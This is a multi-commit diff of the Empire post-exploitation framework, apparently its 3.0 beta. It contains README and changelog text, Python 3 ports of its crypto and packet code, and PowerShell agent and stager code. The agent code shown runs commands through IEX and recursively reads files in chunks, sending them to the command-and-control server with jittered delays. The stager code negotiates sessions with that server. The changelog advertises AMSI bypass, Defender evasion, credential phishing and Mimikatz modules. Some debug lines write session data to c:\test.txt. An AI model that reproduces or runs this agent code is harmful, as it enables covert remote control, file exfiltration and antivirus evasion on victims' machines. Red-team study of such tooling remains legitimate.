...
 
Commits (6)
......@@ -11,7 +11,9 @@ LastTask*
data/obfuscated_module_source/*.ps1
data/misc/ToObfuscate.ps1
data/misc/Obfuscated.ps1
setup/xar/
setup/xar*/
setup/bomutils/
.venv
.DS_Store
venv/
# NOTE: Only use this when you want to build image locally
# else use `docker pull empireproject\empire:{VERSION}`
# else use `docker pull empireproject/empire:{VERSION}`
# all image versions can be found at: https://hub.docker.com/r/empireproject/empire/
# -----BUILD COMMANDS----
......@@ -45,6 +45,8 @@ RUN apt-get update && apt-get install -qy \
apt-utils \
lsb-core \
python2.7 \
python-dev \
&& ln -sf /usr/bin/python2.7 /usr/bin/python \
&& rm -rf /var/lib/apt/lists/*
# build empire from source
......@@ -53,8 +55,6 @@ RUN git clone --depth=1 -b dev https://github.com/EmpireProject/Empire.git /opt/
cd /opt/Empire/setup/ && \
./install.sh && \
rm -rf /opt/Empire/data/empire*
RUN python2.7 /opt/Empire/setup/setup_database.py
WORKDIR "/opt/Empire"
ENTRYPOINT ["./empire"]
# -----END OF BUILD-----
CMD ["python2.7", "empire"]
# Empire
![Empire](https://user-images.githubusercontent.com/20302208/70022749-1ad2b080-154a-11ea-9d8c-1b42632fd9f9.jpg)
[1.1]: http://i.imgur.com/tXSoThF.png (twitter icon with padding)
[2.1]: http://i.imgur.com/P3YfQoD.png (facebook icon with padding)
[3.1]: http://i.imgur.com/yCsTjba.png (google plus icon with padding)
[4.1]: http://i.imgur.com/YckIOms.png (tumblr icon with padding)
[5.1]: http://i.imgur.com/1AGmwO3.png (dribbble icon with padding)
[6.1]: http://i.imgur.com/0o48UoR.png (github icon with padding)
[1]: https://twitter.com/bcsecurity1
[2]: http://www.facebook.com/XXXXXXX
[3]: https://plus.google.com/XXXXXXX
[4]: http://XXXXXXX.tumblr.com
[5]: http://dribbble.com/XXXXXXX
[6]: http://www.github.com/BC-SECURITY
[7]: https://www.bc-security.org/blog
Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at [BSidesLV in 2015](https://www.youtube.com/watch?v=Pq9t59w0mUI) and Python EmPyre premeiered at HackMiami 2016.
![GitHub contributors](https://img.shields.io/github/contributors/BC-SECURITY/Empire)
![GitHub commit activity](https://img.shields.io/github/commit-activity/m/BC-SECURITY/Empire)
![GitHub stars](https://img.shields.io/github/stars/BC-SECURITY/Empire)
![GitHub](https://img.shields.io/github/license/BC-Security/Empire)
[![Twitter URL](https://img.shields.io/twitter/url/https/twitter.com/fold_left.svg?style=flat)](https://twitter.com/BCSecurity1)
Keep up-to-date on our blog at [https://www.bc-security.org/blog][7]
# Empire
## The beta release of [Empire 3.0](https://github.com/BC-SECURITY/Empire/tree/dev) is available on the dev branch ##
Empire 3.0 is a post-exploitation framework that includes a pure-PowerShell 2.0 Windows agent, and compatibility with Python 2.x/3.x Linux/OS X agents. It is the merger of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire premiered at [BSidesLV in 2015](https://www.youtube.com/watch?v=Pq9t59w0mUI) and Python EmPyre premeiered at HackMiami 2016. BC-Security presented updates to further evade Microsoft Antimalware Scan Interface (AMSI) and JA3/S signatures at [DEF CON 27](https://github.com/BC-SECURITY/DEFCON27).
Empire relies heavily on the work from several other projects for its underlying functionality. We have tried to call out a few of those people we've interacted with [heavily here](http://www.powershellempire.com/?page_id=2) and have included author/reference link information in the source of each Empire module as appropriate. If we have failed to improperly cite existing or prior work, please let us know.
Empire is developed by [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), and [@xorrior](https://twitter.com/xorrior).
Empire is developed by [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [@rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), [@xorrior](https://twitter.com/xorrior), and [@bcsecurity1](https://twitter.com/BCSecurity1). While the main fork for Empire is no longer maintained, this fork is maintained by [BC-Security](https://www.bc-security.org) and will continue to receive periodic updates.
Feel free to join us on Slack! http://adaptiveempire.slack.com/
## Release Notes
With the release of the 3.0 beta, there are some major upgrades to Empire. Many of these have lingered on various branches of the Empire project and have finally been consolidated, as well as, there being several new updates. The biggest change to mention is the conversion of the Empire base code from Python 2.7 to Python 2.7/3.x compatible. This will ensure that Empire continues to function as Kali drops Python 2.7 support. The conversion also causes some issues in the way that bytes and strings are handled which will likely cause some unfound errors.
We have tested the core http listeners (http, http_hop, http_mapi, redirector) and confirmed that they work in both Python 2.7 and 3.x. We have also tested the Mimikatz modules and several of the launchers. There are still many modules that need to be tested, hence the beta release.
In addition to the code conversion, there are some minor UI updates, a few new modules, and new functionality. The full list of changes can be reviewed in the changelog.
## Install
To install, run `sudo ./setup/install.sh` script or use the corresponding docker image `docker pull empireproject/empire`.
To install and run:
```sh
git clone https://github.com/BC-SECURITY/Empire.git --branch dev
cd Empire
sudo ./setup/install.sh
```
There's also a [quickstart here](http://www.powershellempire.com/?page_id=110) and full [documentation here](http://www.powershellempire.com/?page_id=83).
......@@ -18,16 +54,28 @@ There's also a [quickstart here](http://www.powershellempire.com/?page_id=110) a
Check out the [Empire wiki](https://github.com/EmpireProject/Empire/wiki/Quickstart) for instructions on getting started with Empire.
## To Do List
* Port code to work with Python 3
* [Invoke-SocksProxy](https://github.com/p3nt4/Invoke-SocksProxy)
* Function name randomization
* JA3/S signature randomization
* Multi-menu function calls
* Function name aliasing
* Update to [Mimikatz 2.2.0](https://github.com/gentilkiwi/mimikatz)
## Contribution Rules
Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.
* Beginning with version 2.4, we will only troubleshoot issues for Kali, Debian, or Ubuntu. All other operating systems will not be supported. We understand that this is frustrating but hopefully the new docker build can provide an alternative.
* Beginning with version 3.0, we will require that all updates be both Python 2.x/3.x compatible.
* Submit pull requests to the [dev branch](https://github.com/powershellempire/Empire/tree/dev). After testing, changes will be merged to master.
* Depending on what you're working on, base your module on [./lib/modules/powershell_template.py](lib/modules/powershell_template.py) or [./lib/modules/python_template.py](lib/modules/python_template.py). **Note** that for some modules you may need to massage the output to get it into a nicely displayable text format [with Out-String](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L111).
* Cite previous work in the **'Comments'** module section.
* If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate **data/module_source/*** directory and [pulling the script contents into the module on tasking](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L85-L95).
* Use [approved PowerShell verbs](https://technet.microsoft.com/en-us/library/ms714428(v=vs.85).aspx) for any functions.
* PowerShell Version 2 compatibility is **STRONGLY** preferred.
* TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly.
* PowerShell Version 2 compatibility is **STRONGLY** preferred.
* TEST YOUR MODULE! Be sure to run it from an Empire agent and test both Python 2.x/3.x functionality before submitting a pull to ensure everything is working correctly.
* For additional guidelines for your PowerShell code itself, check out the [PowerSploit style guide](https://github.com/PowerShellMafia/PowerSploit/blob/master/README.md).
[![alt text][1.1]][1]
11/26/2019
------------
- Version 3.0 Beta Release
- Added Python 2.6/7 and 3.x compatibility (@Cx01N, @Hubbl3, @Vinnybod)
- Improved Windows Defender Evasion
- Updated mimikatz binary in Invoke-Mimikatz to version 2.2.0 20190408 (@Cx01N)
- Fixed port assignment feature to listeners (@Cx01N)
- Fixed issues with http_Hop listener (@Cx01N)
- Fixed issues with redirector listener (@Cx01N)
- Fixed typos in default http listener payloads (@Hubbl3)
- Fixed psinject AV recognition (@Hubbl3)
- Updated Invoke-Obfuscation to version 1.8 (@phra)
- Updated Invoke-Kerberoast (@Zero1t0)
- Added ability to uselisteners on main menu (@Cx01N, @Hubbl3)
- Added Get-Subnet_Ranges (@benichmt1)
- Added Get-WinUpdates (@classity)
- Added Get-KerberosServiceTIcket (@OneLogicalMyth)
- Added Invoke-RID_Hijack (@r4wd3r)
- Added Invoke-internal_monologue (@audibleblink)
- Added Invoke-SMBLogin (@mvelazc0)
- Added Sherlock (@_RastaMouse, @audibleblink)
- Added Outlook Sandbox Evasion for Windows Macro launcher (@Cx01N, @Hubbl3)
- Added Randomized JA3S signature (@Hubbl3)
- Added AMSI Bypass based on Tal Liberman's AMSI Bypass (@Hubbl3)
- Added Invoke-CredentialPhisher (@quickbreach)
- Made Security Bypasses configurable for launchers (@phra)
- Updated Readme to include install instruction, EOL of Core Devloper support, new contribution rules
- Added OSX shellcode stager (@johneiser)
- Added Invoke-Phant0m (@leesoh)
- Added Get-AppLockerConfig (@matterpreter)
- Added HostRecon (@RootUp)
- Added more informative PS agent directory listing (@winnie22)
Credit was given based on Commit Author if something is credited incorrectly or we missed an update
please contact us at info@bc-security.org
03/15/2018
------------
- Version 2.5 Master Release
- Patched launcher generation bug
- Patched launcher generation bug
- Added OSX Mic record module #893 (@s0lst1c3)
- More robust password handling in ssh_command and ssh_launcher modules (@retro-engineer)
- Updated server responses for http listener (@xorrior)
......@@ -12,7 +47,7 @@
- Overhaul events system to provide more descriptive messages and accurate logging of events (@DakotaNelson)
- Added macro that backdoors lnk files (@G0ldenGunSec)
- Bug fix for invoke_psexec module when using custom commands (@ThePirateWhoSmellsOfSunflowers)
- Added capability to generate a vs studio project file to generate a csharp launcher (@elitest)
- Added capability to generate a vs studio project file to compile a csharp executable/launcher (@elitest)
- Added capability to enable/disable/delete listeners (@mr64bit)
- Added report generation (@bneg)
- Updated http_com listener to server IIS7 default page and added response headers to evade nessus scans (@s0lst1c3)
......
......@@ -124,10 +124,12 @@ function Invoke-Empire {
# uris(comma separated)|UserAgent|header1=val|header2=val2...
# headers are optional. format is "key:value"
# ex- cookies are "cookie:blah=123;meh=456"
Add-Content c:\test.txt $Profile
$ProfileParts = $Profile.split('|')
$script:TaskURIs = $ProfileParts[0].split(',')
$script:UserAgent = $ProfileParts[1]
$script:SessionID = $SessionID
Add-Content c:\test.txt $SessionID
$script:Headers = @{}
# add any additional request headers if there are any specified in the profile
if($ProfileParts[2]) {
......@@ -279,20 +281,20 @@ function Invoke-Empire {
}
else {
switch -regex ($cmd) {
'(ls|dir)' {
'(ls|^dir)' {
if ($cmdargs.length -eq "") {
$output = Get-ChildItem -force | select lastwritetime,length,name
$output = Get-ChildItem -force | select mode,@{Name="Owner";Expression={(Get-Acl $_.FullName).Owner }},lastwritetime,length,name
}
else {
try{
$output = IEX "$cmd $cmdargs -Force -ErrorAction Stop | select lastwritetime,length,name"
$output = IEX "$cmd $cmdargs -Force -ErrorAction Stop" | select mode,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }},lastwritetime,length,name
}
catch [System.Management.Automation.ActionPreferenceStopException] {
$output = "[!] Error: $_ (or cannot be accessed)."
}
}
}
'(mv|move|copy|cp|rm|del|rmdir)' {
'(mv|move|copy|cp|rm|del|rmdir|mkdir)' {
if ($cmdargs.length -ne "") {
try {
IEX "$cmd $cmdargs -Force -ErrorAction Stop"
......@@ -441,6 +443,8 @@ function Invoke-Empire {
param($JobName)
if($Script:Jobs.ContainsKey($JobName)) {
$Script:Jobs[$JobName]['Buffer'].ReadAll()
$Script:Jobs[$JobName]['PSHost'].Streams.Error
$Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear()
}
}
......@@ -453,6 +457,8 @@ function Invoke-Empire {
$Null = $Script:Jobs[$JobName]['PSHost'].Stop()
# get results
$Script:Jobs[$JobName]['Buffer'].ReadAll()
$Script:Jobs[$JobName]['PSHost'].Streams.Error
$Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear()
# unload the app domain runner
$Null = [AppDomain]::Unload($Script:Jobs[$JobName]['AppDomain'])
$Script:Jobs.Remove($JobName)
......@@ -467,7 +473,8 @@ function Invoke-Empire {
# uris(comma separated)|UserAgent|header1=val|header2=val2...
# headers are optional. format is "key:value"
# ex- cookies are "cookie:blah=123;meh=456"
Add-Content c:\test.txt "Update Profile"
Add-Content c:\test.txt $Profile
$ProfileParts = $Profile.split('|')
$script:TaskURIs = $ProfileParts[0].split(',')
$script:UserAgent = $ProfileParts[1]
......@@ -840,37 +847,39 @@ function Invoke-Empire {
$ChunkSize = 1024KB
}
# resolve the complete path
$Path = Get-Childitem $Path | ForEach-Object {$_.FullName}
# read in and send the specified chunk size back for as long as the file has more parts
$Index = 0
do{
$EncodedPart = Get-FilePart -File "$path" -Index $Index -ChunkSize $ChunkSize
if($EncodedPart) {
$data = "{0}|{1}|{2}" -f $Index, $path, $EncodedPart
Send-Message -Packets $(Encode-Packet -type $type -data $($data) -ResultID $ResultID)
$Index += 1
# if there are more parts of the file, sleep for the specified interval
if ($script:AgentDelay -ne 0) {
$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)
$max = [int]((1+$script:AgentJitter)*$script:AgentDelay)
if ($min -eq $max) {
$sleepTime = $min
}
else{
$sleepTime = Get-Random -minimum $min -maximum $max;
# resolve the complete paths
$Path = Get-Childitem -Recurse $Path -File | ForEach-Object {$_.FullName}
foreach ( $File in $Path) {
# read in and send the specified chunk size back for as long as the file has more parts
$Index = 0
do{
$EncodedPart = Get-FilePart -File "$file" -Index $Index -ChunkSize $ChunkSize
if($EncodedPart) {
$data = "{0}|{1}|{2}" -f $Index, $file, $EncodedPart
(& $SendMessage -Packets $(Encode-Packet -type $type -data $($data) -ResultID $ResultID))
$Index += 1
# if there are more parts of the file, sleep for the specified interval
if ($script:AgentDelay -ne 0) {
$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)
$max = [int]((1+$script:AgentJitter)*$script:AgentDelay)
if ($min -eq $max) {
$sleepTime = $min
}
else{
$sleepTime = Get-Random -minimum $min -maximum $max;
}
Start-Sleep -s $sleepTime;
}
Start-Sleep -s $sleepTime;
}
}
[GC]::Collect()
} while($EncodedPart)
[GC]::Collect()
} while($EncodedPart)
Encode-Packet -type 40 -data "[*] File download of $path completed" -ResultID $ResultID
Encode-Packet -type 40 -data "[*] File download of $file completed" -ResultID $ResultID
}
}
catch {
Encode-Packet -type 0 -data '[!] File does not exist or cannot be accessed' -ResultID $ResultID
......
This diff is collapsed.
......@@ -3,6 +3,12 @@ Implements AES in python as a jinja2 partial.
AES code from https://github.com/ricmoo/pyaes
"""
from builtins import bytes
from builtins import chr
from builtins import zip
from builtins import str
from builtins import range
from builtins import object
import copy
import struct
import hashlib
......@@ -109,19 +115,19 @@ class AES(object):
rounds = self.number_of_rounds[len(key)]
# Encryption round keys
self._Ke = [[0] * 4 for i in xrange(rounds + 1)]
self._Ke = [[0] * 4 for i in range(rounds + 1)]
# Decryption round keys
self._Kd = [[0] * 4 for i in xrange(rounds + 1)]
self._Kd = [[0] * 4 for i in range(rounds + 1)]
round_key_count = (rounds + 1) * 4
KC = len(key) // 4
# Convert the key into ints
tk = [struct.unpack('>i', key[i:i + 4])[0] for i in xrange(0, len(key), 4)]
tk = [struct.unpack('>i', key[i:i + 4])[0] for i in range(0, len(key), 4)]
# Copy values into round key arrays
for i in xrange(0, KC):
for i in range(0, KC):
self._Ke[i // 4][i % 4] = tk[i]
self._Kd[rounds - (i // 4)][i % 4] = tk[i]
......@@ -139,12 +145,12 @@ class AES(object):
rconpointer += 1
if KC != 8:
for i in xrange(1, KC):
for i in range(1, KC):
tk[i] ^= tk[i - 1]
# Key expansion for 256-bit keys is "slightly different" (fips-197)
else:
for i in xrange(1, KC // 2):
for i in range(1, KC // 2):
tk[i] ^= tk[i - 1]
tt = tk[KC // 2 - 1]
......@@ -153,7 +159,7 @@ class AES(object):
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
for i in xrange(KC // 2 + 1, KC):
for i in range(KC // 2 + 1, KC):
tk[i] ^= tk[i - 1]
# Copy values into round key arrays
......@@ -165,8 +171,8 @@ class AES(object):
t += 1
# Inverse-Cipher-ify the decryption round key (fips-197 section 5.3)
for r in xrange(1, rounds):
for j in xrange(0, 4):
for r in range(1, rounds):
for j in range(0, 4):
tt = self._Kd[r][j]
self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
self.U2[(tt >> 16) & 0xFF] ^
......@@ -184,11 +190,11 @@ class AES(object):
a = [0, 0, 0, 0]
# Convert plaintext to (ints ^ key)
t = [(_compact_word(plaintext[4 * i:4 * i + 4]) ^ self._Ke[0][i]) for i in xrange(0, 4)]
t = [(_compact_word(plaintext[4 * i:4 * i + 4]) ^ self._Ke[0][i]) for i in range(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
for r in range(1, rounds):
for i in range(0, 4):
a[i] = (self.T1[(t[ i ] >> 24) & 0xFF] ^
self.T2[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T3[(t[(i + s2) % 4] >> 8) & 0xFF] ^
......@@ -198,7 +204,7 @@ class AES(object):
# The last round is special
result = []
for i in xrange(0, 4):
for i in range(0, 4):
tt = self._Ke[rounds][i]
result.append((self.S[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.S[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
......@@ -218,11 +224,11 @@ class AES(object):
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in range(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
for r in range(1, rounds):
for i in range(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
......@@ -232,7 +238,7 @@ class AES(object):
# The last round is special
result = []
for i in xrange(0, 4):
for i in range(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
......@@ -252,11 +258,11 @@ def decrypt(self, ciphertext):
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in range(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
for r in range(1, rounds):
for i in range(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
......@@ -266,7 +272,7 @@ def decrypt(self, ciphertext):
# The last round is special
result = [ ]
for i in xrange(0, 4):
for i in range(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
......
""" Implements Diffie-Hellman as a Jinja2 partial for use in stagers
DH code from: https://github.com/lowazo/pyDHE """
from __future__ import print_function
from builtins import bytes
from builtins import str
from builtins import object
import os
import hashlib
......@@ -65,7 +69,7 @@ class DiffieHellman(object):
0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E438777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300741FA7BF8AFC47ED2576F6936BA424663AAB639C5AE4F5683423B4742BF1C978238F16CBE39D652DE3FDB8BEFC848AD922222E04A4037C0713EB57A81A23F0C73473FC646CEA306B4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A062B3CF5B3A278A66D2A13F83F44F82DDF310EE074AB6A364597E899A0255DC164F31CC50846851DF9AB48195DED7EA1B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F924009438B481C6CD7889A002ED5EE382BC9190DA6FC026E479558E4475677E9AA9E3050E2765694DFC81F56E880B96E7160C980DD98EDD3DFFFFFFFFFFFFFFFFF
}
if group in primes.keys():
if group in list(primes.keys()):
return primes[group]
else:
print("Error: No prime with group %i. Using default." % group)
......
......@@ -53,10 +53,9 @@ def get_sysinfo(nonce='00000000'):
language = 'python'
cmd = 'ps %s' % (os.getpid())
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = ps.communicate()
parts = out.split("\n")
ps.stdout.close()
if len(parts) > 2:
processName = " ".join(parts[1].split()[4:])
else:
......
from __future__ import print_function
from builtins import chr
from builtins import range
import os
import struct
......@@ -8,7 +11,7 @@ LANGUAGE = {
}
LANGUAGE_IDS = {}
for name, ID in LANGUAGE.items(): LANGUAGE_IDS[ID] = name
for name, ID in list(LANGUAGE.items()): LANGUAGE_IDS[ID] = name
META = {
'NONE' : 0,
......@@ -19,17 +22,17 @@ META = {
'SERVER_RESPONSE' : 5
}
META_IDS = {}
for name, ID in META.items(): META_IDS[ID] = name
for name, ID in list(META.items()): META_IDS[ID] = name
ADDITIONAL = {}
ADDITIONAL_IDS = {}
for name, ID in ADDITIONAL.items(): ADDITIONAL_IDS[ID] = name
for name, ID in list(ADDITIONAL.items()): ADDITIONAL_IDS[ID] = name
def rc4(key, data):
"""
Decrypt/encrypt the passed data using RC4 and the given key.
"""
S,j,out=range(256),0,[]
S,j,out=list(range(256)),0,[]
for i in range(256):
j=(j+S[i]+ord(key[i%len(key)]))%256
S[i],S[j]=S[j],S[i]
......@@ -102,11 +105,11 @@ def parse_routing_packet(stagingKey, data):
return results
else:
print "[*] parse_agent_data() data length incorrect: %s" % (len(data))
print("[*] parse_agent_data() data length incorrect: %s" % (len(data)))
return None
else:
print "[*] parse_agent_data() data is None"
print("[*] parse_agent_data() data is None")
return None
......
......@@ -52,7 +52,7 @@ function Start-Negotiate {
# try to ignore all errors
$ErrorActionPreference = "SilentlyContinue";
$e=[System.Text.Encoding]::ASCII;
$e=[System.Text.Encoding]::UTF8;
$SKB=$e.GetBytes($SK);
# set up the AES/HMAC crypto
......
function Start-Negotiate {
param($s,$SK,$UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
param($s,$SK,$UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',$hop)
function ConvertTo-RC4ByteStream {
Param ($RCK, $In)
......@@ -57,7 +57,7 @@ function Start-Negotiate {
# try to ignore all errors
$ErrorActionPreference = "SilentlyContinue";
$e=[System.Text.Encoding]::ASCII;
$e=[System.Text.Encoding]::UTF8;
$customHeaders = "";
$SKB=$e.GetBytes($SK);
# set up the AES/HMAC crypto
......@@ -222,6 +222,7 @@ function Start-Negotiate {
}
}
$wc.Headers.Add("User-Agent",$UA);
$wc.Headers.Add("Hop-Name",$hop);
# step 5 of negotiation -> client posts nonce+sysinfo and requests agent
$raw=$wc.UploadData($s+"/index.php","POST",$rc4p2);
......@@ -239,4 +240,4 @@ function Start-Negotiate {
Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;
}
# $ser is the server populated from the launcher code, needed here in order to facilitate hop listeners
Start-Negotiate -s "$ser" -SK 'REPLACE_STAGING_KEY' -UA $u;
Start-Negotiate -s "$ser" -SK 'REPLACE_STAGING_KEY' -UA $u -hop "$hop";
......@@ -57,7 +57,7 @@ function Start-Negotiate {
# try to ignore all errors
$ErrorActionPreference = "SilentlyContinue";
$e=[System.Text.Encoding]::ASCII;
$e=[System.Text.Encoding]::UTF8;
$customHeaders = "";
$SKB=$e.GetBytes($SK);
# set up the AES/HMAC crypto
......
......@@ -52,7 +52,7 @@ function Start-Negotiate {
# try to ignore all errors
$ErrorActionPreference = "SilentlyContinue";
$e=[System.Text.Encoding]::ASCII;
$e=[System.Text.Encoding]::UTF8;
$SKB=$e.GetBytes($SK);
# set up the AES/HMAC crypto
......
......@@ -27,8 +27,8 @@ namespace cmd
pipeline.Commands.AddScript(decodedScript);
pipeline.Commands.Add("Out-String");
pipeline.Commands.Add("Out-Default");
pipeline.Invoke();
}
}
}
\ No newline at end of file
}
from __future__ import print_function
from builtins import str
from builtins import object
from lib.common import helpers
class Module:
class Module(object):
def __init__(self, mainMenu, params=[]):
......@@ -156,11 +159,11 @@ Invoke-Redirector"""
addAsListener = False
listenerName = False
for option,values in self.options.iteritems():
for option,values in self.options.items():
if option.lower() == "listener" and values['Value'] != '':
# extract out all options from a listener if one is set
if not self.mainMenu.listeners.is_listener_valid(values['Value']):
print helpers.color("[!] Invalid listener set")
print(helpers.color("[!] Invalid listener set"))
return ""
else:
listenerName = values['Value']
......@@ -186,9 +189,9 @@ Invoke-Redirector"""
agent = self.options['Agent']['Value']
port = self.options['ListenPort']['Value']
self.mainMenu.listeners.add_pivot_listener(listenerName, agent, port)
print helpers.color("[*] Added pivot listener on port " + str(port))
print(helpers.color("[*] Added pivot listener on port " + str(port)))
else:
print helpers.color("[!] Listener not set, pivot listener not added.")
print(helpers.color("[!] Listener not set, pivot listener not added."))
return ""
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
......
......@@ -123,7 +123,7 @@ http://www.exploit-monday.com
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -1038,7 +1038,7 @@ $RemoteScriptBlock = {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
